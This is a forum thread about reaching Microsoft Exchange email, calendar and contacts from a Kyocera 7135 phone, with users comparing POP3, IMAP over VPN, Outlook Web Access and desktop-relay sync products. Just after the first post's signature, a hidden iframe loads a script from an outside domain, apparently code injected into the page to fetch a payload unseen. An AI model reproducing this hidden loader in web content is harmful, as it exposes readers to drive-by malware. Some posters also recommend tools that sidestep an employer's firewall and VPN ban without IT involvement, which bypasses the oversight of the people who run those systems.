+ Reply to Thread

Can 7135 access MS Exchange Server?

Hello,

I am about to opt-in for a Kyocera 7135 phone for my Verizon service but I want to make sure that the phone will either a) access my MS Exchange corporate e-mail without a problem or b) let me access OWA.

Anyone tried either of the above?

Warren<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

mail server

Right now I am accessing my mail server by smtp and pop3 with my palmIII and my cellular so when I will receive my 7135, my intention is to do the same but with a single device. My two devices will be incorporated in the same unit call 7135.

With a mail client and an access to your exchange you should be able to access you exchange server in smtp and pop3 protocol.

Have fun!!!!

Louis

If I access my Exchange server via POP3, nothing will be synchronized with the Exchange server; it will just download the messages locally. I want everything, including calendar and contacts, to be stored on the Exchange server when I make modifications from the 7135. Is this possible?

Originally posted by warrenj
    If I access my Exchange server via POP3, nothing will be synchronized with the Exchange server; it will just download the messages locally. I want everything, including calendar and contacts, to be stored on the Exchange server when I make modifications from the 7135. Is this possible?
    I had similar needs (I wanted to dump my Blackberry). We also don't allow POP3 through our firewall, so that was not even an option for me.

The best solution I have found is Workstyle from Wireless Knowledge (www.wirelessknowledge.com). Like Blackberry, it requires a server side component. If you have a desktop you can leave on (which I do), then you are set. It syncs calendar, contacts, and email. Full sync -- i.e. if you read an unread email on the 7135, it shows it read in Outlook, which is quite nice. If you have Documents to Go, it will give you access to attachments which is also very useful. I've been using it for about 2 weeks and although it has some quirks, it works overall.

I tried InBoxToGo as well (which many people here seem to like), but it only syncs email, crashed my phone on about a fifth of the syncs, does not fully sync (i.e. the read on phone example above), does not allow you to specify how many days worth to sync (it is all or nothing which is daunting if you have a lot of emails in your exchange inbox), and only updates every 15 minutes...

I was able to access OWA via Blazer, but it was not pretty, nor easy to use.

MS Exchange Server

This proved possible, but our computer consultant had to configure the MS Exchange server to be accessed from outside via POP, something that had not been enabled when the MS server was installed, because they did not envision the need for it. Once that was done, it started working like a charm.
    rablock

I was reluctant to give up Sprint PCS largely due to the PCS Business Connection that allows access to MS-Outlook email WITHOUT firewall issues. With my KYO I'm using Laplink Everywhere ($99 for a year of service less a $70 rebate for being a former Laplink customer!), and it works fine. No firewall issues, much faster than Business Connection, requires the desktop to stay on and connected. Downside is that there is no "offline" access but I didn't do much of that anyway.

They have a 15 day downloadable trial at www.laplink.com.

Check the thread called "Corp email" for a discussion on this topic. I'll add my experience here though:

If your company doesn't formally support email to handheld devices yet, and it has a firewall, and if VPN-ing through the firewall isn't a workable option, then the only way to make corp email syncing work is using the approach that solutions like Inbox-to-Go and Workstyle use. This requires a desktop or laptop to be logged into your email on a permanent basis, with a software agent on that machine automatically syncing your corp email with a 3rd-party server, accessible on the Internet, that your 7135 sync's against.

I tried Inbox-to-Go w/Docs-to-Go for corp email w/attachments, and liked the way you could tap on the attachment from within the msg, and it would launch the doc from Docs-to-Go. However, I had the same complaints that another member posted above, and worst of all, my corp network blocked all mail that I tried to send to co-workers (external email was fine though).

So I tried Workstyle w/Docs-to-Go, and I liked it enough to purchase it, but with a couple misgivings:

1) Since I didn't have easy access to a spare machine, I asked WirelessKnowledge if Workstyle could be run from my admin's machine. They said yes, and they were right--but it sync'd HER Outlook (even though I had delegated privileges to her and she had my Inbox, Contacts, & Calendar open). They then said that their solution could not offer any workaround to this--only the primary Outlook profile on that machine is recognized!

2) Workstyle is only compatible with Eudora Mail and Palm Mail, neither of which support attachments when sending email. Receiving attachments works fine, as does forwarding msgs w/attachments, as Workstyle converts attachments to the Docs-to-Go format and downloads them to Docs-to-Go to get around Eudora's lack of direct support for attachments. If you're used to SnapperMail's very nice and intuitive attachments support for POP3 email accounts, you will find Workstyle more limiting. Docs-to-Go provides an email client called 'Dataviz Mail', but it's only designed to sync email w/attachments via HotSync--not really wireless corp email (that's why Dataviz offers Inbox-to-Go).

3) Make sure you download & install Docs-to-Go v5.001, not the latest 5.004, as Workstyle doesn't support attachments using 5.004 (see the Corp Email thread for the link to v5.001). Also, you need to install Docs-to-Go first, then Workstyle, for Workstyle to support Docs-to-Go attachments.

Last, I've been seeing some press releases from the QuickOffice folks indicating much more 'native' support for attachments, and overall, I expect to see a lot of improvement to products in this space in the near term. So if you can wait a couple months, it may be worth exploring multiple solutions. (For me, I hope SnapperMail starts supporting Corp Email in addition to POP3--it's got great attachment support.)
    Ahhhh, gadgets! :bigthumb:

I was the one who originally started the Corp e-mail thread.

Not even knowing what the parameters were for my corp e-mail, I downloaded a bunch of programs then found out our corrporate servers could not be accessed via POP3, so that narrowed the list down considerable.

I tried Wireless Knowledge, and thought it was OK. The SMS notification did not work at the time, and the attachments were limited.

I tried and bought NotifyLink Desktop, (www.notifycorp.com) and while it was inexpensive, it did not support attachments, and did not take full advantage of the 7135's capabilites.

I am currently beta testing BaseJet (www.basejet.com) (at the suggestion of PDAdoc) and it works pretty well. The program is not all the way there and has it share of quirks, but overall I love the functionality. It does not talk full advantage of the 7135's capabilities either but does support attachments, but not in native form.

Bottom line is...without POP3 access, and the ability to use a program like SnapperMail, we are limited.

The Corp e-mail thread goes through quite a bit and offers other suggestions that may be helpful.

Good luck...

Jeff
    Jeff
    Tampa FL
    Blackberry 7230 w/ T-Mobile

E-mail: djjefft@aol.com
    AIM: djjefft

Originally posted by djjefft
    I was the one who originally started the Corp e-mail thread.

Not even knowing what the parameters were for my corp e-mail, I downloaded a bunch of programs then found out our corrporate servers could not be accessed via POP3, so that narrowed the list down considerable.

I tried Wireless Knowledge, and thought it was OK. The SMS notification did not work at the time, and the attachments were limited.

I tried and bought NotifyLink Desktop, (www.notifycorp.com) and while it was inexpensive, it did not support attachments, and did not take full advantage of the 7135's capabilites.

I am currently beta testing BaseJet (www.basejet.com) (at the suggestion of PDAdoc) and it works pretty well. The program is not all the way there and has it share of quirks, but overall I love the functionality. It does not talk full advantage of the 7135's capabilities either but does support attachments, but not in native form.

Bottom line is...without POP3 access, and the ability to use a program like SnapperMail, we are limited.

The Corp e-mail thread goes through quite a bit and offers other suggestions that may be helpful.

Good luck...

Jeff
    Thanks for the basejet tip. I've been using it for a couple of days now and it is the best I've found. It is definitely still beta, and not yet feature complete, but it has the most straightforward Outlike-like interface. And it lets you accept/reject meeting requests from your phone. That alone is a winning feature for me. Hopefully they will continue to advance the product...

I have not actually done any of these possible solutions, but I intend to.

Microsoft Outlook Web Access is one way to get in, but it is heavy on graphics. While our servers are not yet open to webaccess for outlook, I have seen that it is not very manageable on the mini browser on the 7135.

I have come across two possible solutions that we are going to implement. Both require loading the program on the server, and they allow you to do the same as Microsoft Outlook Web Access, but the graphics are set up to be more manageable on a minibrowser or WAP browser.

www.leederbyshire.com
    www.nowspeed.com

Originally posted by jmegibow
    Thanks for the basejet tip. I've been using it for a couple of days now and it is the best I've found. It is definitely still beta, and not yet feature complete, but it has the most straightforward Outlike-like interface. And it lets you accept/reject meeting requests from your phone. That alone is a winning feature for me. Hopefully they will continue to advance the product...
    No problem on the basejet tip. I really like it.

The only problems I am having with it is when I reply to someone on my server it does not see their e-mail address, so if I try to send it, it ends up sitting in my desktop out box.

This is a known bug and they are working on it. For now when I reply, I have to put the e-mail address in the TO: box.

Overall...a great program that fits my needs.

Jeff
    Jeff
    Tampa FL

Does Basejet require Wireless Sync service (Verizon)?

Does BaseJet require Verizon customers to sign up for wireless sync service ($25 - $50/mon), or will it work without that?

Re: Does Basejet require Wireless Sync service (Verizon)?

Originally posted by yambu
    Does BaseJet require Verizon customers to sign up for wireless sync service ($25 - $50/mon), or will it work without that?
    It will work with a 1x or QNC connection.

Jeff
    Jeff
    Tampa FL

Basejet

I am having trouble with hot synch and attachments with the Basejet demo. I can get and send emails (using IMAP with Outlook but not an outlook exchange server) but the attachments sometimes come with this winmail.dat file instead of the actual file. Basejet has said it is in the Outlook settings but I can not figure it out. Regarding the hotsynch, it doesnt appear to remove messages from my IMAP inbox that I deleted on the 7135. Any thoughts or help?

Thumbs up

Check out the new (March 2004) In Box Wireless from Dataviz. It works for me. It is expensive but I need the access to MS Exchange through a firewall. It handles attachments through Documents to Go. It requires your PC to be on and connected to the network / internet all the time.

We use Mergic VPN to get to our corporate network and then Versamail 2.5 to get email from our Exchange 5.5 server using IMAP. Attachments are viewed/edited with Documents-to-Go.

If our corporate desktop is up we can also connect to the corporate network with Mergic VPN and do a remote hotsync to update calendars and address books, but it is very slow.

My administrator does not allow us to VPN. The InBox ToGo Wireless (DataViz) I mentioned above gets around this. You can try the program for free for 30 days and see if it works for you! It even sets itself up. I didn't have any problems with my installation it worked from the first try. I am not a techie so I don't know how it works. All I know is I can get my e-mails (Corporate firewalled MS Exchange) anywhere there is cell service, and I don't have to have my administrator or the IT guys involved! You can use SD cards to save RAM both for the application and the attachments.

I use Snapper for my pop3 e-mails. It also handles attachments through Documents To Go.

Assuming you have VPN access to your exchange server...

I purchased MergicVPN and use MobileMail (came with the 7135). Simply set up MobileMail to access your server via IMAP.

New/Read/Sent mail syncs just fine.

Tony